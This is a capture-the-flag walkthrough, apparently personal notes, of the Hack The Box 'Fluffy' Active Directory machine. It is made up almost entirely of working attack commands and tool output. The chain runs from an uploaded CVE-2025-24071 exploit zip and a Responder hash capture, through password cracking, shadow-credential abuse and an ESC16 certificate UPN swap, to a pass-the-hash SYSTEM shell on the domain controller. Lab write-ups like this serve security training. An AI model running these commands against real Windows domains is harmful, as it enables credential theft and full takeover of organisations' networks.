Here is my note on FLUFFY box from Hackthebox.
FLUFFY: 10.129.237.207
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
sudo bloodhound-python -u 'j.fleischman' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all
sudo bloodhound-python -u 'winrm.svc' -p 'J0elTHEM4n1990!' -ns 10.129.237.207 -d fluffy.htb -c all
BLOODHOUND DATA:
p.agila -> MemberOf -> Service Account Managers Group -> GenericAll -> Service Accounts Group:
net rpc group addmem "Service Accounts" "p.agila" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"
net rpc group members "Service Accounts" -U "fluffy.htb"/"p.agila"%"prometheusx-303" -S "10.129.237.207"
p.agila:prometheusx-303
Service Accounts Group -> GenericWrite -> ldap_svc, winrm_svc and ca_svc users
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'p.agila' -p 'prometheusx-303' #NOPE
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "winrm_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=winrm service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: e58dd69d-78df-ae09-3a79-9e4da52a3e6f
[*] Updating the msDS-KeyCredentialLink attribute of winrm_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: d2PJiAHB.pfx
[*] Must be used with password: Zdssd2loJN16Ce5QOrM4
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx d2PJiAHB.pfx -password "Zdssd2loJN16Ce5QOrM4" -out unprotected_pfx.pfx
certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx unprotected_pfx.pfx -username "winrm_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: winrm_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'winrm_svc.ccache'
[*] Trying to retrieve NT hash for 'winrm_svc'
[*] Got hash for 'winrm_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:33bd09dcd697600edf6b3a7af4875767
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "p.agila" -p 'prometheusx-303' --target "ca_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a9849ddd-f03a-9f69-c807-a3d874b2fe88
[*] Updating the msDS-KeyCredentialLink attribute of ca_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Ugq5IV6S.pfx
[*] Must be used with password: 2zcOSced1xFtRrRnPlgy
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
certipy cert -export -pfx Ugq5IV6S.pfx -password "2zcOSced1xFtRrRnPlgy" -out ca_svc.pfx
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# certipy auth -pfx ca_svc.pfx -username "ca_svc" -domain "fluffy.htb"
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Got hash for 'ca_svc@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:ca0f4f9e9eb8a092addf53bb03fc98c8
ESC16 Notes:
Update Certipy to version 5.0.0+
certipy find -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207
certipy find -vulnerable -stdout -u 'ca_svc@fluffy.htb' -hashes :ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207
[*] Enumeration output:
Certificate Authorities
0
CA Name : fluffy-DC01-CA
DNS Name : DC01.fluffy.htb
Certificate Subject : CN=fluffy-DC01-CA, DC=fluffy, DC=htb
Certificate Serial Number : 3670C4A715B864BB497F7CD72119B6F5
Certificate Validity Start : 2025-04-17 16:00:16+00:00
Certificate Validity End : 3024-04-17 16:11:16+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Disabled Extensions : 1.3.6.1.4.1.311.25.2
Permissions
Owner : FLUFFY.HTB\Administrators
Access Rights
ManageCa : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
ManageCertificates : FLUFFY.HTB\Domain Admins
FLUFFY.HTB\Enterprise Admins
FLUFFY.HTB\Administrators
Enroll : FLUFFY.HTB\Cert Publishers
[!] Vulnerabilities
ESC16 : Security Extension is disabled.
[*] Remarks
ESC16 : Other prerequisites may be required for this to be exploitable. See the wiki for more details.
Certificate Templates : [!] Could not find any certificate templates
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc16-security-extension-disabled-on-ca-globally
```
Attacker (attacker@corp.local) has GenericWrite permission over a "victim" account (victim@corp.local). The victim account can enroll in any suitable client authentication template (e.g., the default "User" template) on the ESC16-vulnerable CA. The target for impersonation is administrator@corp.local.
```
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -upn 'administrator' \
-user 'ca_svc' update
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -user 'ca_svc' \
read
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
certipy shadow \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -account 'ca_svc' \
auto
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy shadow \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -account 'ca_svc' \
auto
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '940711bf-3814-0722-71a2-52f1db4eea54'
[*] Adding Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '940711bf-3814-0722-71a2-52f1db4eea54' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
export KRB5CCNAME=ca_svc.ccache
certipy req \
-k -dc-ip '10.129.104.173' \
-target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
-template 'User'
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy req -k -dc-ip '10.129.104.173' -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
certipy account \
-u 'p.agila@fluffy.htb' -p 'prometheusx-303' \
-dc-ip '10.129.104.173' -upn 'ca_svc@fluffy.htb' \
-user 'ca_svc' update
certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# certipy auth -pfx administrator.pfx -domain fluffy.htb -dc-ip 10.129.104.173
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
GOT ADMINISTRATOR HASH !
administrator:8da83a3fa618b6e3a00e93f676c92a6e
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.239.160]
└─# psexec.py -hashes :8da83a3fa618b6e3a00e93f676c92a6e administrator@10.129.104.173
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.104.173.....
[*] Found writable share ADMIN$
[*] Uploading file hPrPyfgu.exe
[*] Opening SVCManager on 10.129.104.173.....
[*] Creating service qucU on 10.129.104.173.....
[*] Starting service qucU.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.6893]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
DC01
SYSTEM-SHELL !
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 3DE7-5FBC
Directory of C:\Users\Administrator\Desktop
05/19/2025 03:31 PM <DIR> .
05/19/2025 03:31 PM <DIR> ..
06/03/2025 01:50 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,095,933,440 bytes free
C:\Users\Administrator\Desktop> type root.txt
[REDIRECTED]
ROOT.TXT: [REDIRECTED]
PAST WORK:
certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'ca_svc' update
certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read
certipy req -u 'winrm_svc' -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
certipy req \
-k -dc-ip '10.129.44.104' \
-target 'dc01.fluffy.htb' -ca 'fluffy-DC01-CA' \
-template 'User'
certipy account -u ca_svc@fluffy.htb -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.44.104 -upn administrator -user winrm_svc update
certipy req -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -dc-ip 10.129.44.104 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User -upn administrator@fluffy.htb
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -target 'fluffy.htb' -upn 'administrator' -user 'winrm_svc' update
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: fluffy.htb.
[!] Use -debug to print a stacktrace
[*] Updating user 'winrm_svc':
userPrincipalName : administrator
[*] Successfully updated 'winrm_svc'
┌──(certipy-venv)─(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# certipy account -u 'ca_svc' -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.129.237.207 -user 'winrm_svc' read
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'winrm_svc':
cn : winrm service
distinguishedName : CN=winrm service,CN=Users,DC=fluffy,DC=htb
name : winrm service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1603
sAMAccountName : winrm_svc
servicePrincipalName : WINRM/winrm.fluffy.htb
userPrincipalName : administrator
userAccountControl : 66048
whenCreated : 2025-04-19T11:51:39+00:00
whenChanged : 2025-05-30T04:03:33+00:00
DON'T WORK and DON'T BOTHER !:
python3 pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p "J0elTHEM4n1990!" --target "ca_svc" --action "add"
python3 /home/kali/Kali-Tools/attacktive-directory-tools/pywhisker/pywhisker.py -d "fluffy.htb" -u "winrm.svc" -p 'J0elTHEM4n1990!' --target "ca_svc" --action "add"
python3 targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
python3 /home/kali/Kali-Tools/attacktive-directory-tools/targetedKerberoast/targetedKerberoast.py -v -d 'fluffy.htb' -u 'winrm.svc' -p 'J0elTHEM4n1990!'
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-30 01:03:16Z)
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------- --------- --------------------------------------------- -------------------------- -------------------------- ----------
ADCS/ca.fluffy.htb ca_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 12:07:50.136701 2025-05-21 18:21:15.969274
LDAP/ldap.fluffy.htb ldap_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-04-17 12:17:00.599545 <never>
WINRM/winrm.fluffy.htb winrm_svc CN=Service Accounts,CN=Users,DC=fluffy,DC=htb 2025-05-17 20:51:16.786913 2025-05-19 11:13:22.188468
faketime -f $(ntpdate -q dc01.fluffy.htb | awk '{print $4}') bash
GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! > kerb_hashes.txt
NOPE - All of the users are uncrackable.
GetUserSPNs.py -request -dc-ip 10.129.237.207 fluffy.htb/j.fleischman:J0elTHEM4n1990! -request -save -outputfile GetUserSPNS.out
GetNPUsers.py -dc-ip 10.129.237.207 fluffy.htb/ -usersfile users.txt -format hashcat
#NO ASREPROASTING and KERBEROASTING = DON'T BOTHER !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb, Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb" '(objectClass=person)' > ldap-people
ldapsearch -H ldap://10.129.237.207 -x -W -D "j.fleischman@fluffy.htb" -b "dc=fluffy,dc=htb" > ldap-output.txt
#NO PASSWORD DISCLOSURE and interesting description fields.
nxc ldap 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --dns-tcp --dns-server 10.129.237.207 --bloodhound --collection All
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc ldap 10.129.237.207 -u winrm.svc -p 'J0elTHEM4n1990!'
LDAP 10.129.237.207 389 10.129.237.207 [-] Error retrieving os arch of 10.129.237.207: Could not connect: timed out
SMB 10.129.237.207 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
LDAP 10.129.237.207 389 DC01 [-] Error in searchRequest -> operationsError: 000004DC: LdapErr: DSID-0C090CB2, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
LDAP 10.129.237.207 389 DC01 [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!
445/tcp open microsoft-ds?
crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
nxc smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u users.txt -p J0elTHEM4n1990! --continue-on-success
SMB 10.129.237.207 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\j.coffey:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\winrm.svc:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\p.agila:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\ldap_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\ca_svc:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\krbtgt:J0elTHEM4n1990! STATUS_LOGON_FAILURE
SMB 10.129.237.207 445 DC01 [-] fluffy.htb\administrator:J0elTHEM4n1990! STATUS_LOGON_FAILURE
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# cat users.txt
j.fleischman
j.coffey
winrm.svc
p.agila
ldap_svc
ca_svc
krbtgt
administrator
Got winrm.svc credential ! #NOPE FALSE POSITIVE
winrm.svc:J0elTHEM4n1990!
It's winrm_svc not winrm.svc = FALSE POSITIVE !
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc smb 10.129.237.207 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [*] Enumerated shares
SMB 10.129.237.207 445 DC01 Share Permissions Remark
SMB 10.129.237.207 445 DC01 ----- ----------- ------
SMB 10.129.237.207 445 DC01 ADMIN$ Remote Admin
SMB 10.129.237.207 445 DC01 C$ Default share
SMB 10.129.237.207 445 DC01 IPC$ READ Remote IPC
SMB 10.129.237.207 445 DC01 IT READ,WRITE
SMB 10.129.237.207 445 DC01 NETLOGON READ Logon server share
SMB 10.129.237.207 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc smb 10.129.237.207 -u j.fleischman -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [*] Enumerated shares
SMB 10.129.237.207 445 DC01 Share Permissions Remark
SMB 10.129.237.207 445 DC01 ----- ----------- ------
SMB 10.129.237.207 445 DC01 ADMIN$ Remote Admin
SMB 10.129.237.207 445 DC01 C$ Default share
SMB 10.129.237.207 445 DC01 IPC$ READ Remote IPC
SMB 10.129.237.207 445 DC01 IT READ,WRITE
SMB 10.129.237.207 445 DC01 NETLOGON READ Logon server share
SMB 10.129.237.207 445 DC01 SYSVOL READ Logon server share
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec smb 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!' --shares
SMB 10.129.237.207 445 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.237.207 445 DC01 [+] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
SMB 10.129.237.207 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
If crackmapexec don't work then use nxc as a backup !
sudo lookupsid.py j.fleischamn@10.129.237.207 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/IT]
└─# smbclient \\\\10.129.237.207\\IT -U "j.fleischman"
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu May 29 22:53:58 2025
.. D 0 Thu May 29 22:53:58 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1853329 blocks available
smb: \> mask ""
smb: \> recurse
smb: \> prompt
smb: \> mget *
Upgrade_Notice.pdf:
Recent Vulnerabilities
CVE ID Severity
CVE-2025-24996 Critical
CVE-2025-24071 Critical - I will think about it.
CVE-2025-46785 High - NOPE
CVE-2025-29968 High - NOPE
CVE-2025-21193 Medium - NOPE
CVE-2025-3445 Low - NOPE
CVE-2025-24071 Critical = WORKS !
https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
https://github.com/0x6rss/CVE-2025-24071_PoC
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# python3 poc.py
Enter your file name: test
Enter IP (EX: 192.168.1.162): 10.10.14.146
completed
┌──(root㉿kali)-[/home/…/BOXES/FLUFFY/10.129.237.207/CVE-2025-24071_PoC]
└─# ls
exploit.zip poc.py README.md
smb: \> put exploit.zip
putting file exploit.zip as \exploit.zip (2.2 kb/s) (average 2.2 kb/s)
smb: \> dir
. D 0 Thu May 29 23:09:23 2025
.. D 0 Thu May 29 23:09:23 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 11:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 11:04:05 2025
exploit.zip A 316 Thu May 29 23:09:23 2025
KeePass-2.58 D 0 Fri Apr 18 11:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 11:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 10:31:07 2025
5842943 blocks of size 4096. 1914658 blocks available
Responder:
[SMB] NTLMv2-SSP Client : 10.129.237.207
[SMB] NTLMv2-SSP Username : FLUFFY\p.agila
[SMB] NTLMv2-SSP Hash : p.agila::FLUFFY:6d9184522b8a6eb5:90C72BE4FC9307C2E20FA9EFA56E3A19:010100000000000000A146F2B3D0DB01067631E67D603D080000000002000
800560046004C004D0001001E00570049004E002D004300550050004B0056004E0033004400310050005A0004003400570049004E002D004300550050004B0056004E0033004400310050005A00
2E00560046004C004D002E004C004F00430041004C0003001400560046004C004D002E004C004F00430041004C0005001400560046004C004D002E004C004F00430041004C000700080000A146F
2B3D0DB010600040002000000080030003000000000000000010000000020000059BB148E3C6418A32E79B118D34F764613C1D0D394F94C40FAC674B7042E1BD40A001000000000000000000000
000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340036000000000000000000
p.agila::FLUFFY:6d9184522b8a6eb5:90C72BE4FC9307C2E20FA9EFA56E3A19:010100000000000000A146F2B3D0DB01067631E67D603D080000000002000800560046004C004D0001001E00570049004E002D004300550050004B0056004E0033004400310050005A0004003400570049004E002D004300550050004B0056004E0033004400310050005A002E00560046004C004D002E004C004F00430041004C0003001400560046004C004D002E004C004F00430041004C0005001400560046004C004D002E004C004F00430041004C000700080000A146F2B3D0DB010600040002000000080030003000000000000000010000000020000059BB148E3C6418A32E79B118D34F764613C1D0D394F94C40FAC674B7042E1BD40A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100340036000000000000000000
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt p.agila_hashes
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
prometheusx-303 (p.agila)
1g 0:00:00:05 DONE (2025-05-29 16:12) 0.1808g/s 816977p/s 816977c/s 816977C/s proquis..programmercomputer
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
p.agila:prometheusx-303
p.agila credential discovered !
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec winrm 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!'
SMB 10.129.237.207 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb)
HTTP 10.129.237.207 5985 DC01 [*] http://10.129.237.207:5985/wsman
WINRM 10.129.237.207 5985 DC01 [-] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc winrm 10.129.237.207 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
WINRM 10.129.237.207 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
WINRM 10.129.237.207 5985 DC01 [+] fluffy.htb\winrm_svc:33bd09dcd697600edf6b3a7af4875767 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# evil-winrm -i 10.129.237.207 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
DC01
USER-SHELL !
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/29/2025 5:51 PM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
[REDIRECTED]
USER.TXT: [REDIRECTED]
PRIV ESC:
Shadow Credential to ca_svc for Certificate enumeration.
#Check BLOODHOUND DATA section again.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open unknown
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open unknown
49698/tcp open msrpc Microsoft Windows RPC
49705/tcp open unknown
49730/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
https://seriotonctf.github.io/2024/06/26/ADCS-Attacks-with-Certipy/index.html
https://medium.com/@muneebnawaz3849/ad-cs-esc16-misconfiguration-and-exploitation-9264e022a8c6
